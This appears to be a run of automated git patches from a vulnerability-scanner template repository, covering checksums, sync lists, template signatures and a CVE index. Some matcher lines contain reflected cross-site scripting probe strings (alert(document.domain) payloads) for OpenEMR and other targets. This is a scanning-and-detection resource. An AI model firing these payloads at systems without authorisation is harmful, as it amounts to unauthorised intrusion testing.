ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2a4c1827fbe6b47750608b75cab33ea0d9a4bd10 +templates-checksum.txt:168cd746d9eab2eae2ce4852f4158b6815e59996 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 89955de2df986b4be8a32166f7cf66192823571f Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 13:55:50 +0000 Subject: [PATCH 0311/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 8a796656d7..d71733155b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' + - 'http/exposed-panels/femtocell-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' - 'http/vulnerabilities/titan/titannit-web-ssrf.yaml' From 1f7f6ace0c671f2e005d5e1667f9b405b3e1e145 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 13:56:45 +0000 Subject: [PATCH 0312/1768] Auto Generated New Template Addition List [Tue Apr 23 13:56:45 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6696b1282e..1e7a9b68ae 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml From 72f30cb5615e44fec36a04754128badce1457900 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:56:53 +0000 Subject: [PATCH 0313/1768] Auto Generated Templates Checksum [Tue Apr 23 13:56:53 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8b43e5ad64..226ad00460 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2999,6 +2999,7 @@ http/cves/2023/CVE-2023-29300.yaml:058aae0088baca6c4104fd3ed918e5c69b98c06f http/cves/2023/CVE-2023-29357.yaml:f024b56091f0df09f899d7dce5127f26be7f53e0 http/cves/2023/CVE-2023-29439.yaml:d4dcbb476711e37b1aefb260fada7f7c73bc587e http/cves/2023/CVE-2023-29489.yaml:47180817e6bc2c1554749248108d72d58a282932 +http/cves/2023/CVE-2023-2949.yaml:a8492b12df1ee6379800d96cb0bd395d613a4226 http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3 http/cves/2023/CVE-2023-29623.yaml:190f636848087dae84be89aa535ffed1f5c02d97 http/cves/2023/CVE-2023-2982.yaml:9cedb0411e86004cfa66c75629847a8267266235 @@ -8438,7 +8439,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:168cd746d9eab2eae2ce4852f4158b6815e59996 +templates-checksum.txt:821756e584b4e347f672af8ead0d42925e5a54ca wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 68beb77a8d197dd174a2e037d92db10259790951 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:57:03 +0000 Subject: [PATCH 0314/1768] Auto Template Signing [Tue Apr 23 13:57:03 UTC 2024] :robot: --- http/exposed-panels/femtocell-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/femtocell-panel.yaml b/http/exposed-panels/femtocell-panel.yaml index 13fae89e3e..6579f80d86 100644 --- a/http/exposed-panels/femtocell-panel.yaml +++ b/http/exposed-panels/femtocell-panel.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a0048304602210087b2e4ce87b6cde8ac949f25c7f85a41f5e01942067ac081aa5e4af2cdef54e2022100c093b7ca5bac558cac9317df081e5aedcd635cb1129379ef1fade51569baf1a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 91540e3cef03ebe6a8d739e670aa4827924af0a6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Apr 2024 19:27:27 +0530 Subject: [PATCH 0315/1768] update info --- http/misconfiguration/installer/sabnzbd-installer.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/misconfiguration/installer/sabnzbd-installer.yaml b/http/misconfiguration/installer/sabnzbd-installer.yaml index 42dcaeca1c..23501ebce6 100644 --- a/http/misconfiguration/installer/sabnzbd-installer.yaml +++ b/http/misconfiguration/installer/sabnzbd-installer.yaml @@ -1,7 +1,7 @@ id: sabnzbd-installer info: - name: SABnzbd Quick-Start Wizard - Detect + name: SABnzbd Quick-Start Wizard - Exposure author: DhiyaneshDk severity: high description: | @@ -10,8 +10,8 @@ info: - https://www.sabnzbd.org/ metadata: verified: true - max-request: 1 - shodan-query: http.favicon.hash:"-1939892142" + max-request: 2 + shodan-query: html:"SABnzbd Quick-Start Wizard" fofa-query: body="SABnzbd Quick-Start Wizard" tags: sabnzbd,wizard,installer,misconfig From e3b80cdea8adaff1a10185950eb4a006fc55d52f Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 13:57:27 +0000 Subject: [PATCH 0316/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d71733155b..69cb5fce1f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' From 150db696ff89d3ef2a13fc0270898e693c34fd1f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 14:00:14 +0000 Subject: [PATCH 0317/1768] Auto Generated Templates Checksum [Tue Apr 23 14:00:14 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 226ad00460..2fc587cb0e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2998,6 +2998,7 @@ http/cves/2023/CVE-2023-29298.yaml:2dd762a56ce650feb87703cf13af9ad126d8103a http/cves/2023/CVE-2023-29300.yaml:058aae0088baca6c4104fd3ed918e5c69b98c06f http/cves/2023/CVE-2023-29357.yaml:f024b56091f0df09f899d7dce5127f26be7f53e0 http/cves/2023/CVE-2023-29439.yaml:d4dcbb476711e37b1aefb260fada7f7c73bc587e +http/cves/2023/CVE-2023-2948.yaml:f7bcad8120345a1d0411ab9e213e60fb88dff65a http/cves/2023/CVE-2023-29489.yaml:47180817e6bc2c1554749248108d72d58a282932 http/cves/2023/CVE-2023-2949.yaml:a8492b12df1ee6379800d96cb0bd395d613a4226 http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3 @@ -3747,7 +3748,7 @@ http/exposed-panels/fastpanel-hosting-control-panel.yaml:c53b1d9ac66491f5b7e535f http/exposed-panels/fatpipe-ipvpn-panel.yaml:96d8b28698b2fb761fc63eb8c962983740911722 http/exposed-panels/fatpipe-mpvpn-panel.yaml:6cab1c3b59ad31436a7de8f8303cc327b2471d3b http/exposed-panels/fatpipe-warp-panel.yaml:657b1162cb1f511f08b091843db0b3ef3332ad59 -http/exposed-panels/femtocell-panel.yaml:33760c0a350f45ba7bcef2dd9879df10a8c8a821 +http/exposed-panels/femtocell-panel.yaml:59fecabb8ff387fae6b069f94d56cad02ae7aec1 http/exposed-panels/filebrowser-login-panel.yaml:693739adaae9ae64099d57ea5ac8960181670338 http/exposed-panels/fiori-launchpad.yaml:6350276e5ddc465db38147e5b0543161cc5d3afc http/exposed-panels/fiorilaunchpad-logon.yaml:789b18f0d60dbe8f6b3355aa9eaa79e7e2adbd66 @@ -8439,7 +8440,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:821756e584b4e347f672af8ead0d42925e5a54ca +templates-checksum.txt:bc6fd6c8d93692a362723f93f662b12e77f8d421 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9c453891202a792e1d3f754360836b33a09e53b0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 14:00:16 +0000 Subject: [PATCH 0318/1768] Auto Generated cves.json [Tue Apr 23 14:00:16 UTC 2024] :robot: --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 1fca015f17..737df67c5d 100644 --- a/cves.json +++ b/cves.json @@ -2104,7 +2104,9 @@ {"ID":"CVE-2023-29300","Info":{"Name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29300.yaml"} {"ID":"CVE-2023-29357","Info":{"Name":"Microsoft SharePoint - Authentication Bypass","Severity":"critical","Description":"Microsoft SharePoint Server Elevation of Privilege Vulnerability\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29357.yaml"} {"ID":"CVE-2023-29439","Info":{"Name":"FooGallery plugin \u003c= 2.2.35 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin \u003c= 2.2.35 versions.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29439.yaml"} +{"ID":"CVE-2023-2948","Info":{"Name":"OpenEMR \u003c 7.0.1 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2948.yaml"} {"ID":"CVE-2023-29489","Info":{"Name":"cPanel \u003c 11.109.9999.116 - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"} +{"ID":"CVE-2023-2949","Info":{"Name":"OpenEMR \u003c 7.0.1 - Cross-site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2949.yaml"} {"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"} {"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"} {"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 7877c96f35..4003692003 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -c289499c72b1f8a29d351d81adb20aec +821dd44c3f6aa64d48b4c78506dd0928 From fd78d1e0346b5be9bec7afd29b29fef0e6253b0b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 14:02:04 +0000 Subject: [PATCH 0319/1768] Auto Template Signing [Tue Apr 23 14:02:04 UTC 2024] :robot: --- http/cves/2023/CVE-2023-2948.yaml | 1 + http/cves/2023/CVE-2023-2949.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index 636411a950..b511f09fb5 100644 --- a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -37,3 +37,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "list_id: 1}});}}alert(document.domain);", "select at least one Provider", "Save</span>")' condition: and +# digest: 490a0046304402201f348c1ad965519aec601dea4e3594a4203bb91d9386861d1e29e43cfc7f69de02206a1be3fef962ba9fa56678781c5c622f895d192dac29bdfc696cee29e7e75608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index 5a0abfcbd5..250149ced7 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -37,3 +37,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "<img src=x onerror=alert(document.domain);>", "openemr")' condition: and +# digest: 4a0a004730450220108fa66c2cdc6c8b7680bd5104e88e717b840d2571b4c6ad031c039f4eb9ccd6022100b75192c2cd5ddb7e9874af2830784c6516ea54684cde65e41b82e565b835337a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8661f91ede0bbe9045839ba51290637410206032 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 14:04:36 +0000 Subject: [PATCH 0320/1768] Auto Generated New Template Addition List [Tue Apr 23 14:04:36 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 1e7a9b68ae..d66a70de97 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2023/CVE-2023-2948.yaml http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml @@ -5,5 +6,6 @@ http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/cassia-bluetooth-gateway-panel.yaml http/exposed-panels/femtocell-panel.yaml http/exposed-panels/tixeo-panel.yaml +http/misconfiguration/installer/sabnzbd-installer.yaml http/misconfiguration/titannit-web-exposure.yaml http/vulnerabilities/titan/titannit-web-ssrf.yaml From a6b9beef3f335baeb0702ccf8e532d42e65d869c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 14:04:40 +0000 Subject: [PATCH 0321/1768] Auto Generated Templates Checksum [Tue Apr 23 14:04:40 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2fc587cb0e..b9d9c46531 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:36f00087c499db934d2d7817000d577a042fef18 -cves.json-checksum.txt:ea54c3128a95b8556ca5f197b1230b7961721467 +cves.json:bf2dd3082903ea2749fe2ff89768d7f662de7004 +cves.json-checksum.txt:f7534eadff910c0718fb4875220000c349ee4793 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -2998,9 +2998,9 @@ http/cves/2023/CVE-2023-29298.yaml:2dd762a56ce650feb87703cf13af9ad126d8103a http/cves/2023/CVE-2023-29300.yaml:058aae0088baca6c4104fd3ed918e5c69b98c06f http/cves/2023/CVE-2023-29357.yaml:f024b56091f0df09f899d7dce5127f26be7f53e0 http/cves/2023/CVE-2023-29439.yaml:d4dcbb476711e37b1aefb260fada7f7c73bc587e -http/cves/2023/CVE-2023-2948.yaml:f7bcad8120345a1d0411ab9e213e60fb88dff65a +http/cves/2023/CVE-2023-2948.yaml:7ad9cd30952a0ea7e9166d7fb65ef1c220b258ef http/cves/2023/CVE-2023-29489.yaml:47180817e6bc2c1554749248108d72d58a282932 -http/cves/2023/CVE-2023-2949.yaml:a8492b12df1ee6379800d96cb0bd395d613a4226 +http/cves/2023/CVE-2023-2949.yaml:9fc7aee0d145a80fbd71cee3ff9e2267e33da980 http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3 http/cves/2023/CVE-2023-29623.yaml:190f636848087dae84be89aa535ffed1f5c02d97 http/cves/2023/CVE-2023-2982.yaml:9cedb0411e86004cfa66c75629847a8267266235 @@ -5382,6 +5382,7 @@ http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1af http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d +http/misconfiguration/installer/sabnzbd-installer.yaml:a299d70ce27c1c2e8f78871fcc8257a6632abf9c http/misconfiguration/installer/server-monitor-installer.yaml:f39667bafa3e2904cb11eb521b4399020c8711c8 http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1d6902429ee3b1f32710 http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab @@ -8440,7 +8441,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:bc6fd6c8d93692a362723f93f662b12e77f8d421 +templates-checksum.txt:e74eab4cc83b415d4777a26447691b0340d72bf4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e92ffe1f126a78cb0ff7a45bb8b7f15c06670838 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 14:05:47 +0000 Subject: [PATCH 0322/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 69cb5fce1f..361e194ef1 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-2948.yaml' - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' @@ -10,6 +11,7 @@ on: - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' - 'http/exposed-panels/femtocell-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' + - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' - 'http/vulnerabilities/titan/titannit-web-ssrf.yaml' workflow_dispatch: From 73c4b7e6dd6d401786c3c4a193436f276fbb54e4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 14:06:28 +0000 Subject: [PATCH 0323/1768] Auto Template Signing [Tue Apr 23 14:06:28 UTC 2024] :robot: --- http/misconfiguration/installer/sabnzbd-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/sabnzbd-installer.yaml b/http/misconfiguration/installer/sabnzbd-installer.yaml index 23501ebce6..208240ae99 100644 --- a/http/misconfiguration/installer/sabnzbd-installer.yaml +++ b/http/misconfiguration/installer/sabnzbd-installer.yaml @@ -32,3 +32,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100e0f82c995b6a686d3028d757d7b32b9cfe867077f24b73d12bb70b78cb1f07b1022100d39bd3dfca7af6030eb799c7a3edf07645f7b7f2b2943901ef8a999c2be63e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fd1627eab9bf6612c10260eb3dfa17776519e8ea Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 14:21:40 +0000 Subject: [PATCH 0324/1768] Auto Generated New Template Addition List [Tue Apr 23 14:21:40 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d66a70de97..cf616b3c8d 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2023/CVE-2023-2948.yaml http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml +http/cves/2023/CVE-2023-4973.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/cassia-bluetooth-gateway-panel.yaml From 5b3beae43da6d5da8f92fdc79cc66ad6f55ea805 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 14:21:45 +0000 Subject: [PATCH 0325/1768] Auto Generated Templates Checksum [Tue Apr 23 14:21:45 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b9d9c46531..92aca2859e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3174,6 +3174,7 @@ http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 http/cves/2023/CVE-2023-49070.yaml:ea832772cb56e40e0acc8527138089777b673f16 http/cves/2023/CVE-2023-49103.yaml:8eab68a4f41466e6d9bef692647cc9e86969bd49 http/cves/2023/CVE-2023-4966.yaml:14102dfbda787ccbbd24875179e48acbdae04643 +http/cves/2023/CVE-2023-4973.yaml:a84e7b26530a270f2e44cc242e3bff3beac10515 http/cves/2023/CVE-2023-4974.yaml:d7a5386c5971e13babc28e9f346991ef0e82fba2 http/cves/2023/CVE-2023-49785.yaml:37c94b4ef0f6b07d703d372d1e5a0841e9a3184e http/cves/2023/CVE-2023-50290.yaml:993704655d9bb469f8ea073c9757676b3ee1468f @@ -5382,7 +5383,7 @@ http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1af http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d -http/misconfiguration/installer/sabnzbd-installer.yaml:a299d70ce27c1c2e8f78871fcc8257a6632abf9c +http/misconfiguration/installer/sabnzbd-installer.yaml:2acada1b432839b43acf35fc04137d074444be5c http/misconfiguration/installer/server-monitor-installer.yaml:f39667bafa3e2904cb11eb521b4399020c8711c8 http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1d6902429ee3b1f32710 http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab @@ -8441,7 +8442,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e74eab4cc83b415d4777a26447691b0340d72bf4 +templates-checksum.txt:9e52b8977efbdbcc3e3186160d8b8f7e3da7be06 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e9f10453b761fbfd2a6859218c2c3387dcd3d28c Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 14:22:20 +0000 Subject: [PATCH 0326/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 361e194ef1..ae1df7187b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2023/CVE-2023-2948.yaml' - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' + - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' From 2c17b9d0bfed31e5a63c43128ca3f685a4c718f2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 14:23:32 +0000 Subject: [PATCH 0327/1768] Auto Template Signing [Tue Apr 23 14:23:32 UTC 2024] :robot: --- http/cves/2023/CVE-2023-4973.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-4973.yaml b/http/cves/2023/CVE-2023-4973.yaml index 9d9f469003..9094021c35 100644 --- a/http/cves/2023/CVE-2023-4973.yaml +++ b/http/cves/2023/CVE-2023-4973.yaml @@ -36,3 +36,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "<script>alert(document.domain)</script>", "List of tuitions")' condition: and +# digest: 490a0046304402204b8dd881b5a0b3f7d38c4d13a40eb9e39cc3726f383612727f6b2ee9cba71b9002204c739c7fc378e976f510cb9fe88163ebae00d114bc2fc1c226a888889e010c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fd5b7fb6aaeeed28238770e22aed8f801f3b92fe Mon Sep 17 00:00:00 2001 From: theMiddleBlue <menin.andrea@gmail.com> Date: Tue, 23 Apr 2024 16:47:28 +0200 Subject: [PATCH 0328/1768] fix: replace matcher type with regex --- 